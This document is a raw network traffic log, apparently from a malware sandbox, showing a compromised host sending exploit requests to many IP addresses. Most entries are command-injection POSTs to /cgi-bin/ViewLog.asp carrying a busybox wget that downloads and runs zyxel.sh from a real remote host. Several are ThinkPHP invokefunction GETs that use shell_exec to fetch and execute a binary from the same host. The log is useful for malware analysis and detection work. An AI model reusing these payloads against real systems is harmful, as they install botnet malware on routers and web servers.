22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 77 61 74 7a 6c 2e 70 68 6f 74 6f 67 72 61 70 68 79 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 77 61 74 7a 6c 2e 70 68 6f 74 6f 67 72 61 70 68 79 2f 22 2c 22 6e 61 6d 65 22 3a 22 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68
                                                              Data Ascii: 3ed1<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v20.1 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - twatzl Photography</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - twatzl Photography" /><meta property="og:site_name" content="twatzl Photography" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://twatzl.photography/#website","url":"https://twatzl.photography/","name":"twatzl Photography","description":"","publisher":{"@id":"h


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              118192.168.2.235613494.120.60.2218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.910335064 CET3290OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              119192.168.2.234369294.122.16.1438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.913779020 CET3291OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              12192.168.2.236073062.121.130.1678080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.392230988 CET437OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:02.096050978 CET552INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:01 GMT
                                                              Server: Apache
                                                              Content-Length: 362
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              120192.168.2.234432295.217.26.15280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.361949921 CET3325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:26.671263933 CET3344INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              121192.168.2.234939031.136.105.128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.588191986 CET3340OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:27.601886034 CET3461OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.617662907 CET3702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:33.809107065 CET4297OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:42.000036001 CET5175OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:58.125979900 CET7201OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.377787113 CET11135OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              122192.168.2.234094631.200.44.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.604732990 CET3341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              123192.168.2.234206862.29.92.1798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.604907036 CET3342OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              124192.168.2.233399295.86.119.1878080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.623720884 CET3343OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              125192.168.2.235227031.170.55.1158080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.953289032 CET3438OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              126192.168.2.234594295.156.54.1180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:26.985340118 CET3448OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              127192.168.2.233504495.111.127.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:27.653371096 CET3462OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              128192.168.2.235137294.121.158.1878080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:27.658514023 CET3463OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              129192.168.2.235781494.120.213.548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:27.668920994 CET3463OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              13192.168.2.2334206112.125.190.16680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.528858900 CET438OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.842154980 CET536INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:14:51 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              130192.168.2.2348556112.124.15.13380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:27.906816959 CET3507OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.211396933 CET3571INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              131192.168.2.2339480112.121.165.24280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:27.929162979 CET3508OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.264683962 CET3574INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Set-Cookie: ants_waf_sc=226899170
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              132192.168.2.233446495.179.128.6880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.538603067 CET3580OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.828933954 CET3617INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              133192.168.2.235377895.101.245.16680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.542872906 CET3580OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
